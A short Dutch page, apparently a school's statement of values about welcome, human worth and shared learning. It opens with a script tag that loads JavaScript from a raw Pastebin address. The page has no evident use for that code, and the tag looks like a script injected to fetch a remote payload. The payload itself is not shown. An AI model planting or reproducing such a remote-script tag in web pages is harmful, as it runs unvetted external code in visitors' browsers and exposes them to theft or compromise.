<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Een school is een plek waar:

iedereen welkom is om bij te dragen aan het doel van de school.
Iedereen wordt gezien als een mens met waarde.
Alle leerlingen en volwassenen elkaar ondersteunen en actief leren.